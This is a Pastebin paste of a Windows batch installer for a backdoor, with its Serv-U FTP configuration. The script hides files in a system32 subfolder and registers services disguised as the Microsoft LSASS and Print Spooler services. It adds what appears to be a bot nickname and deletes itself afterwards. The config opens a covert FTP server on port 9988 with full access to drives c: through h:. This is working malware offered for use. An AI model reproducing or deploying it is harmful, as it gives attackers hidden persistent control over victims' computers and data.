Guest User

Untitled

a guest
May 27th, 2018
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.54 KB | None | 0 0
  1. @echo off
  2. IF EXIST C:\WINDOWS GOTO XP_INST
  3.  
  4. :XP_INST
  5. move unr.exe %windir%\system32\unr.exe
  6. move a.rar %windir%\system32\a.rar
  7. cd %windir%\system32
  8. md inetcfg
  9. move unr.exe %windir%\system32\inetcfg\unr.exe
  10. move a.rar %windir%\system32\inetcfg\a.rar
  11. cd inetcfg
  12. md pax
  13. unr.exe e -o- a.rar
  14. del /f lsass.ocx
  15. del /f servudaemon.ini
  16. rename lsass.win lsass.ocx
  17. rename servudaemon.win servudaemon.ini
  18. echo user_nick [PMT]-[2K2]-[%random%]>>lsass.ocx
  19. sd remove Serv-u
  20. sd install lsass lsass "Microsoft Local Security Authority Service" "c:\windows\system32\inetcfg\lsass.exe lsass.ocx" 1 1
  21. sd install ssv ssv "Microsoft Print Spooler" "C:\windows\system32\inetcfg\spoolsv.exe /h" 1 1
  22. del /f a.rar
  23. del /f unr.exe
  24. service start ssv
  25. service start lsass
  26. cd c:\
  27. del /f inst.bat
  28. :END
  29.  
  30. ===================================
  31. servudaemon.ini
  32. ===================================
  33.  
  34. [GLOBAL]
  35. Version=5.1.0.0
  36. ProcessID=5076
  37.  
  38. [DOMAINS]
  39. Domain1=0.0.0.0||9988|ps|1|0|0
  40.  
  41. [Domain1]
  42. User1=DJ-KAMuS|1|0
  43. User2=upload|1|0
  44. SignOn=c:\windows\system32\inetcfg\s0
  45. DirChangeMesFile=c:\windows\system32\inetcfg\d0
  46. DirChangeMesFile2=c:\windows\system32\inetcfg\d0
  47.  
  48. [USER=DJ-KAMuS|1]
  49. Password=IUW6SqDNszkOI
  50. HomeDir=c:\
  51. TimeOut=600
  52. Maintenance=System
  53. Access6=c:\|RWAMELCDP
  54. Access5=d:\|RWAMELCDP
  55. Access4=e:\|RWAMELCDP
  56. Access3=f:\|RWAMELCDP
  57. Access2=g:\|RWAMELCDP
  58. Access1=h:\|RWAMELCDP
  59.  
  60. [USER=upload|1]
  61. Password=yi66E5A9F8576D922776FE499149348C26
  62. HomeDir=c:\windows\system32\inetcfg\pax
  63. RelPaths=1
  64. TimeOut=180
  65. Access1=c:\windows\system32\inetcfg\pax|WALCP
Add Comment
Please, Sign In to add comment